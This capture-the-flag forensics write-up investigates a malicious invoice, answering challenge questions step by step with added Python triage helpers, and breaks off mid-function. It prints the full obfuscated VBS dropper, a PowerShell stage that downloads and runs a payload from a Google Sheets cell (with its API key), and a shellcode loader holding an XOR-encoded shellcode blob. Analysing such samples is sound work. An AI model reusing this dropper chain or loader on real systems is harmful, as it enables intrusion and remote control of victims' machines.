Scripts and Formulas
10 min read
We are given the following files:
$ file *
Invoice_01.lnk: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Tue May 30 18:44:18 2023, mtime=Tue Jul 4 11:46:42 2023, atime=Tue May 30 18:44:18 2023, length=492032, window=hidenormalshowminimized
invoice.vbs: ASCII text, with very long lines (2360), with CRLF line terminators
logs.zip: Zip archive data, at least v2.0 to extract, compression method=store
The logs.zip file contains many Windows EVTX log files.
We also have a remote instance where we must answer some questions:
$ nc 209.97.140.29 31969
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Scripts and Formulas | After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, |
| | the UNZ hired a local geologist to examine possible sites that were used in the past |
| | for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, |
| | he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. |
| | Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. |
| | Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! |
| | Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
Question 1
What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)
We are asked for the name of a file that is copied and renamed. For this, we can look at the PowerShell logs using evtx_dump.py (from python-evtx) and grep:
$ evtx_dump.py Windows/System32/Winevt/Logs/Windows\ PowerShell.evtx | grep HostApplication | sort -u
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs
HostApplication=C:\windows\system32\windowspowershell\v1.0\powershell.exe -ep bypass -w hidden -c $url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex
We see that there are two PowerShell commands; one of them is:
cp C:\Windows\System32\cscript.exe .\calc.exe
So this is the answer:
> cscript.exe:calc.exe
[+] Correct!
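A small Python triage helper, added here as an example (not part of the original writeup), that takes HostApplication lines like the two above, extracts the copy-and-rename of a system binary and flags the suspicious PowerShell switches. The sample lines are constructed from the page's two commands (the second one abbreviated) plus one benign line.

```python
import ntpath
import re

# Constructed sample: the two HostApplication lines the writeup pulled out with
# evtx_dump.py | grep HostApplication (the second one abbreviated), plus a benign line.
SAMPLE_LINES = [
    r"HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs",
    r"HostApplication=C:\windows\system32\windowspowershell\v1.0\powershell.exe -ep bypass -w hidden -c $url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('...'));$data|iex",
    r"HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\inventory.ps1",
]

# Switches and keywords that rarely appear together in legitimate administration.
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execution policy bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "non-interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64 decode": re.compile(r"frombase64string", re.I),
}

# cp / copy / copy-item <source> <destination> inside the -c command string
COPY_RE = re.compile(r"\b(?:cp|copy|copy-item)\s+(\S+)\s+([^\s;]+)", re.I)


def host_applications(lines):
    """Return the command lines carried in HostApplication= fields of an evtx_dump."""
    return [line.split("HostApplication=", 1)[1].strip()
            for line in lines if "HostApplication=" in line]


def find_copy_rename(cmd):
    """Return 'source.exe:dest.exe' if the command copies a file under a new name, else None."""
    m = COPY_RE.search(cmd)
    if not m:
        return None
    # ntpath handles Windows backslash paths even when this runs on Linux
    src, dst = ntpath.basename(m.group(1)), ntpath.basename(m.group(2))
    return f"{src}:{dst}" if src.lower() != dst.lower() else None


def suspicious_switches(cmd):
    """Sorted names of the indicators present in the command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


if __name__ == "__main__":
    for cmd in host_applications(SAMPLE_LINES):
        print(find_copy_rename(cmd), suspicious_switches(cmd))
```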
Question 2
What is the name of the function that is used for deobfuscating the strings, in the VBS script? (Eg: funcName)
Here we need to read the VBS script:
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM The great power of VBA programming in Office is that nearly every operation that you can perform with a mouse, keyboard, or a dialog box can also be automated by using VBA. Further, if it can be done once with VBA, it can be done just as easily a hundred times. In fact, the automation of repetitive tasks is one of the most common uses of VBA in Office.
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
End Function
REM Beyond the power of scripting VBA to accelerate every-day tasks, you can use VBA to add new functionality to Office applications or to prompt and interact with the user of your documents in ways that are specific to your business needs. For example, you could write some VBA code that displays a pop up message that reminds users to save a document to a particular network drive the first time they try to save it.
REM This code example shows how to take data from a worksheet and create a table of contents in an HTML file. The worksheet should have data in columns A, B, and C that correspond to the first, second, and third levels of the table of contents hierarchy. The HTML file is stored in the same working folder as the active workbook.
REM crucial for professionals across various industries. Microsoft Office, the go-to suite of productivity tools, offers a wealth of features and functionalities to enhance efficiency. However, many users are unaware of the hidden gem within Office: Visual Basic for Applications (VBA). This versatile programming language empowers users to automate tasks, customize applications, and unleash the full potential of Microsoft Office.
REM Excel, with its powerful data analysis capabilities, is a staple tool for professionals dealing with spreadsheets and calculations. VBA allows users to automate complex operations, manipulate data, and create custom functions to meet specific needs. By writing VBA code, users can streamline repetitive tasks like data entry, report generation, and data formatting. The ability to record and edit macros further simplifies the automation process, making it accessible to users without extensive programming knowledge.
REM Microsoft Word is widely used for creating documents, reports, and templates. With VBA, users can extend Word's functionality beyond its native features. VBA enables the creation of custom toolbars, buttons, and shortcuts to access frequently used commands. Users can also automate document creation by generating personalized letters, merging data from external sources, and performing advanced text manipulations. VBA provides a vast array of possibilities for automating workflows and enhancing document management.
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM Visual Basic for Applications (VBA) is a powerful tool that unlocks the true potential of Microsoft Office. By enabling automation, customization, and streamlining workflows, VBA empowers users to work more efficiently and effectively with Excel, Word, PowerPoint, Access, and Outlook. With its versatility and extensive capabilities, VBA provides professionals with a means to save time, reduce errors, and accomplish more in their day-to-day tasks. Embracing VBA can transform Microsoft Office into a tailored and automated productivity suite, revolutionizing the way we work.
REM VBA can transform PowerPoint into a dynamic presentation tool. Users can leverage VBA to automate the creation of slideshows, generate charts and graphs, and add interactive elements to engage the audience. By utilizing VBA, professionals can reduce the time spent on repetitive tasks such as formatting slides, applying consistent styles, and inserting multimedia content. With the ability to programmatically control every aspect of a presentation, VBA empowers users to deliver impactful and visually stunning presentations.
Function LLdunAaXwVgKfowf(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function
REM VBA extends the capabilities of Microsoft Access and Outlook, allowing users to build powerful databases and automate email communication. In Access, VBA enables the creation of custom forms, reports, and queries, facilitating efficient data management. For Outlook, VBA offers the ability to automate email processing, organize messages into folders, and perform advanced filtering. By leveraging VBA, users can customize these applications to suit their specific needs, increasing productivity and efficiency.
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
There are two functions: ZbVxxAHCsiTnKpIJ (which runs the payload) and LLdunAaXwVgKfowf (which is used to deobfuscate the payload):
> LLdunAaXwVgKfowf
[+] Correct!
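The same deobfuscation routine re-implemented in Python, added here as an example (not code from the writeup or from the sample): LLdunAaXwVgKfowf keeps only the characters that LCase() leaves unchanged and that are not numeric, so the plaintext is whatever survives once uppercase letters and digits are dropped. The fragments below are copied from the beginning of ZbVxxAHCsiTnKpIJ and are reassembled in the same order the VBS concatenates them.

```python
def deobfuscate(t: str) -> str:
    """Mirror of LLdunAaXwVgKfowf: keep c only if c == LCase(c) and Not IsNumeric(c).

    Uppercase letters and digits are the junk; lowercase letters, spaces and
    symbols ($ [ ] ( ) : = . \\ - ' ;) are the real command text.
    """
    return "".join(c for c in t if c == c.lower() and not c.isdigit())


# The VBS builds the command with "&", mixing plain literals ("lit") with
# obfuscated fragments ("obf"); Chr(34) is the double quote. Copied from invoice.vbs.
COMMAND_PARTS = [
    ("obf", r"BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm"),
    ("lit", "32"),
    ("obf", r"V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04"),
    ("lit", "1.0"),
    ("obf", r"\9pMoBw7eTrMsDhKeVlOl1.WeMxUe"),
    ("lit", " "),
    ("obf", "EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V "),
    ("lit", '"'),
    ("obf", "M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e"),
    ("lit", "64"),
    ("obf", "E1sFUtLBrDIiTXn9NgZG(ED'88"),
]


def reconstruct_command(parts=COMMAND_PARTS) -> str:
    """Rebuild the objShell.Run argument the same way the VBS concatenates it."""
    return "".join(deobfuscate(v) if kind == "obf" else v for kind, v in parts)


if __name__ == "__main__":
    # Yields the powershell.exe path, the -ep bypass -w hidden -c switches and the
    # start of the $url = ... stage seen in the HostApplication log entry.
    print(reconstruct_command())
```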
Question 3
What program is used for executing the next stage? (Eg: notepad.exe)
As shown above, there is a second PowerShell command, which most likely comes from the execution of the VBS script. So the answer is:
> powershell.exe
[+] Correct!
Question 4
What is the Spreadsheet ID the malicious actor downloads the next stage from? (Eg: U3ByZWFkU2hlZXQgSUQK)
The PowerShell payload can be formatted as the following code:
$url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));
$resp = invoke-restmethod -uri $url;
$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;
$decode = [system.convert]::frombase64string($payload);
$ms = new-object system.io.memorystream;
$ms.write($decode,0, $decode.length);
$ms.position =0;
$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));
$data = $sr.readtoend();
$sr.close();
$ms.close();
$data|iex
There is a URL that comes from a Base64-encoded string:
$ echo aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU= | base64 -d
https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ?key=AIzaSyDUpjSf7R1l1dQohA5Qv9EdyWA3KBOMc0U&ranges=Sheet1!O37&includeGridData=true
This is a Google Spreadsheet URL. From it, we know that the spreadsheet ID is 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ:
> 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ
[+] Correct!
Question 5
What is the Sheet Name and Cell Number that houses the payload? (Eg: Sheet1:A1)
This information appears in the ranges parameter of the URL (ranges=Sheet1!O37):
> Sheet1:O37
[+] Correct!
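A Python helper, added here as an example (not part of the original writeup), that answers questions 4 and 5 from the Base64 string embedded in the stage above and reproduces the stage's decode chain (Base64, then raw DEFLATE) offline. The cell content itself is not on the page, so the sample cell is constructed with an inverse helper.

```python
import base64
import zlib
from urllib.parse import parse_qs, urlsplit

# Base64 string embedded in the PowerShell stage (copied from the page).
URL_B64 = "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU="


def sheet_target(url_b64):
    """Decode the URL and return (spreadsheet_id, 'Sheet:Cell') in the answer format."""
    url = base64.b64decode(url_b64).decode("ascii")
    parts = urlsplit(url)
    # Path is /v4/spreadsheets/<ID>; the cell comes from the ranges=Sheet1!O37 query parameter
    spreadsheet_id = parts.path.split("/spreadsheets/", 1)[1].split("/")[0]
    sheet, cell = parse_qs(parts.query)["ranges"][0].split("!", 1)
    return spreadsheet_id, f"{sheet}:{cell}"


def decode_cell_payload(formatted_value):
    """Inverse of the stage: Base64 -> raw DEFLATE -> script text.

    .NET DeflateStream is raw DEFLATE (RFC 1951) with no zlib header, so zlib must
    be told to skip the header with a negative wbits; the default wbits=15 would
    raise 'incorrect header check' on this data.
    """
    return zlib.decompress(base64.b64decode(formatted_value), wbits=-15).decode("utf-8")


def is_raw_deflate(formatted_value):
    """True if the data only decompresses as raw DEFLATE (i.e. it carries no zlib header)."""
    data = base64.b64decode(formatted_value)
    try:
        zlib.decompress(data)           # expects an RFC 1950 (zlib) header
        return False
    except zlib.error:
        pass
    zlib.decompress(data, wbits=-15)    # raises if it is not raw DEFLATE either
    return True


def encode_cell_payload(script):
    """Constructed test helper: produce a cell value in the same format (raw DEFLATE + Base64)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


if __name__ == "__main__":
    print(sheet_target(URL_B64))
    # Constructed sample cell; the real cell content is not on the page.
    cell = encode_cell_payload("Write-Host 'constructed stage three'")
    print(is_raw_deflate(cell), decode_cell_payload(cell))
```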
Question 6
What is the Event ID that relates to PowerShell execution? (Eg: 5991)
A quick Internet search will give us the answer to this question:
> 4104
[+] Correct!
Question 7
In the final payload, what is the XOR Key used to decrypt the shellcode? (Eg: 1337)
For this, we can look at more PowerShell logs:
$ evtx_dump.py Windows/System32/Winevt/Logs/Microsoft-Windows-PowerShell%4Operational.evtx | tail -56
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:24.761370"></TimeCreated>
<EventRecordID>79</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0004-ba44-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('...')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
</Data>
<Data Name="ScriptBlockId">a161d800-a564-40a3-aad8-4f9e02e966f7</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
</Events>
As can be seen, this is the next PowerShell stage:
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('32ugx9PL7yMjI2JyYnNxcnVrEvFGa6hxQ2uocTtrqHEDa6hRc2sslGlpbhLqaxLjjx9CXyEPA2Li6i5iIuLBznFicmuocQOoYR9rIvNFols7KCEsplEjIyOoo6sjIyNrpuNXRGsi86hrO3NnqGMDaiLzwHVuEupr3OpiqBerayL1axLjYuLqLo9iIuIbw1bSbyBvBytmGvJW+3tnqGMHaiLzRWKoL2tnqGM/aiLzYqgnq2si82J7Ynt9enlie2J6YnlroM8DYnHcw3tienlrqDHKaNzc3H5qnVRQEXwQESMjYnVqqsVros+DIiMjaqrGap8hIzenbmnlF2J3aqrHb6rSYplvVAUk3PZvqslLIiIjI3pimQqjSCPc9kkpYn1zc24S6m4S42vc42uq4Wvc42uq4mKZySz8w9z2a6rkSTNie2+qwWuq2mKZuoZXQtz2puNXKWrc7VbGy7AjIyNroM8za6rBbhLqSSdie2uq2mKZIfrrfNz2oNsjXXZroOcDfarVSWNieksjMyMjYntrqtFrEupimXuHcMbc9muq4Gqq5G4S6mqq02uq+Wuq2mKZIfrrfNz2oNsjXgt7YnR6SyNjIyNie0kjeWKZKAwsE9z2dHpimVZNbkLc9mrc7cof3NzcayLgawrla6bVVpdi3MR7SSN6auTh05aBddz2')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
There is a for loop where the payload is decrypted using XOR with a key of 35:
> 35
[+] Correct!
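Two ways an analyst can recover that key without trusting the loop, added as an example that is not part of the original writeup: a known-plaintext check against the Metasploit-style x64 stager prologue (cld; and rsp,-0x10), and a byte-frequency heuristic. Only the first 16 Base64 characters of $var_code from the page are embedded, which is enough to exercise both.

```python
import base64

# First 16 Base64 characters of $var_code from the final stage (copied from the page);
# the 12 bytes they encode are enough to test the prologue, so no more is embedded.
VAR_CODE_PREFIX_B64 = "32ugx9PL7yMjI2Jy"

# cld ; and rsp,-0x10 : the standard opening of Metasploit / Cobalt Strike x64
# stagers, a well-known crib that AV and YARA signatures key on.
X64_STAGER_PROLOGUE = bytes.fromhex("fc4883e4f0")


def xor_decode(data, key):
    """Same operation as the script's for loop: every byte -bxor key."""
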